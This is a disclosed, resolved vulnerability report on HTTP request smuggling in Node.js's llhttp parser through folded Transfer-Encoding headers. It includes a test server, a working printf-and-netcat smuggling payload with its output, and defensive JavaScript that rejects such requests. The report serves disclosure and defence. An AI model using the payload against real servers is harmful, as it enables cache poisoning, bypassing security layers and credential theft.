HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encoding (improper fix for CVE-2022-32215)

Medium
Node.js
Reported by shacharm

Vulnerability Details

Technical details and impact analysis

HTTP Request Smuggling
**Summary:** Due to an incomplete fix for CVE-2022-32215, the `llhttp` parser in the `http` module in Node v16.16.0 and 18.7.0 still does not correctly handle multi-line Transfer-Encoding headers. This can lead to HTTP Request Smuggling (HRS).

**Description:** We have identified that the root issue of CVE-2022-32215 (which was [reported here](https://hackerone.com/reports/1501679)) was seemingly not fixed at all. Running the same exploit produces the same unwanted result. For the sake of brevity, I won't repeat the description; it can be seen in the [original issue](https://hackerone.com/reports/1501679).

## Steps To Reproduce:

The reproduction steps are the same as in the original issue.

#### Testing Server

Run the following server (`node server.js`):

```js
const http = require('http');

http.createServer((request, response) => {
  let body = [];
  request.on('error', (err) => {
    response.end("error while reading body: " + err)
  }).on('data', (chunk) => {
    body.push(chunk);
  }).on('end', () => {
    body = Buffer.concat(body).toString();
    response.on('error', (err) => {
      response.end("error while sending response: " + err)
    });
    response.end(JSON.stringify({
      "Headers": request.headers,
      "Length": body.length,
      "Body": body,
    }) + "\n");
  });
}).listen(80);
```

#### Payload

```
printf "POST / HTTP/1.1\r\n"\
"Host: 127.0.0.1\r\n"\
"Transfer-Encoding: chunked\r\n"\
" , chunked-false\r\n"\
"\r\n"\
"1\r\n"\
"A\r\n"\
"0\r\n"\
"\r\n"\
"GET /flag HTTP/1.1\r\n"\
"Host: 127.0.0.1\r\n"\
"foo: x\r\n"\
"\r\n"\
"\r\n" | nc localhost 80
```

#### Output

```
HTTP/1.1 200 OK
Date: Sun, 06 Mar 2022 03:34:05 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 101

{"Headers":{"transfer-encoding":"chunked , chunked-false"},"Length":1,"Body":"A"}
HTTP/1.1 200 OK
Date: Sun, 06 Mar 2022 03:34:05 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 64

{"Headers":{"host":"127.0.0.1", "foo":"x"},"Length":0,"Body":""}
```

As you can see, the payload was parsed as two requests (POST to `/`, and GET to `/flag`), which is erroneous behavior: the first request was parsed as a chunked request, which is wrong. The expected output should be:

```
HTTP/1.1 400 Bad Request
Connection: close
```

## Supporting Material/References:

Exploitation of the issue on Node 16.16.0 - {F1861233}

## Credit

The vulnerability was discovered by Liav Gutman of the JFrog CSO Team.

## Impact

Depending on the specific web application, HRS can lead to cache poisoning, bypassing of security layers, stealing of credentials and so on.
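The payload above works because the continuation line ` , chunked-false` (obsolete line folding) is not treated as part of the Transfer-Encoding value when the body framing is decided. The following is an added example, not code from this report or from Node.js, of the check a defender would put in front of the framing logic: it parses a raw request head, flags any obs-fold, and rejects folded, unknown, mis-ordered or conflicting transfer codings with 400 as RFC 7230 section 3.3.3 requires. Function and constant names are this example's own assumptions.

```javascript
// Added example, not code from the report or from Node.js: a defender-side pre-check
// that rejects the obsolete line folding (obs-fold) the payload above relies on
// before any body-framing decision is made. Function names are this example's own.
const VALID_CODINGS = new Set(['chunked', 'gzip', 'deflate', 'compress', 'identity']);

// Split a raw request head into headers, flagging obs-fold continuation lines
// (leading SP or HTAB). A fold is joined with one SP, as RFC 7230 section 3.2.4
// says a recipient must do if it chooses not to reject, purely for inspection.
function parseHead(rawHead) {
  const lines = rawHead.split('\r\n').filter((l) => l.length > 0);
  const requestLine = lines.shift();
  const headers = [];
  let folded = false;
  for (const line of lines) {
    if (/^[ \t]/.test(line)) {
      folded = true;
      if (headers.length > 0) headers[headers.length - 1].value += ' ' + line.trim();
      continue;
    }
    const idx = line.indexOf(':');
    if (idx < 1) throw new Error(`malformed header line: ${JSON.stringify(line)}`);
    headers.push({ name: line.slice(0, idx).trim().toLowerCase(), value: line.slice(idx + 1).trim() });
  }
  return { requestLine, headers, folded };
}

// Verdict on whether the body framing is unambiguous. Any fold, an unrecognised
// transfer coding, chunked not being the final coding, or Transfer-Encoding next
// to Content-Length is answered with 400 and the connection closed (RFC 7230 3.3.3).
function checkFraming(rawHead) {
  const { headers, folded } = parseHead(rawHead);
  if (folded) return { ok: false, status: 400, reason: 'obsolete line folding in header' };
  const te = headers.filter((h) => h.name === 'transfer-encoding');
  const cl = headers.filter((h) => h.name === 'content-length');
  if (te.length && cl.length) return { ok: false, status: 400, reason: 'Transfer-Encoding with Content-Length' };
  for (const h of te) {
    const codings = h.value.split(',').map((c) => c.trim().toLowerCase());
    const bad = codings.find((c) => !VALID_CODINGS.has(c));
    if (bad !== undefined) return { ok: false, status: 400, reason: `unknown transfer coding: ${bad}` };
    if (codings[codings.length - 1] !== 'chunked') return { ok: false, status: 400, reason: 'chunked is not the final coding' };
  }
  return { ok: true, status: 200, reason: 'framing unambiguous' };
}

// Constructed sample: the head of the report's payload, with its folded line.
const SMUGGLE_HEAD = 'POST / HTTP/1.1\r\nHost: 127.0.0.1\r\nTransfer-Encoding: chunked\r\n , chunked-false\r\n\r\n';
const CLEAN_HEAD = 'POST / HTTP/1.1\r\nHost: 127.0.0.1\r\nTransfer-Encoding: chunked\r\n\r\n';
console.log(checkFraming(SMUGGLE_HEAD), checkFraming(CLEAN_HEAD));
```

The same check is useful at a reverse proxy in front of an unpatched Node.js version, since rejecting the folded head there means the back end never sees the ambiguous framing.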

Related CVEs

Associated Common Vulnerabilities and Exposures

The llhttp parser <v14.20.1, <v16.17.1 and <v18.9.1 in the http module in Node.js does not correctly handle multi-line Transfer-Encoding headers. This can lead to HTTP Request Smuggling (HRS).

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Weakness

HTTP Request Smuggling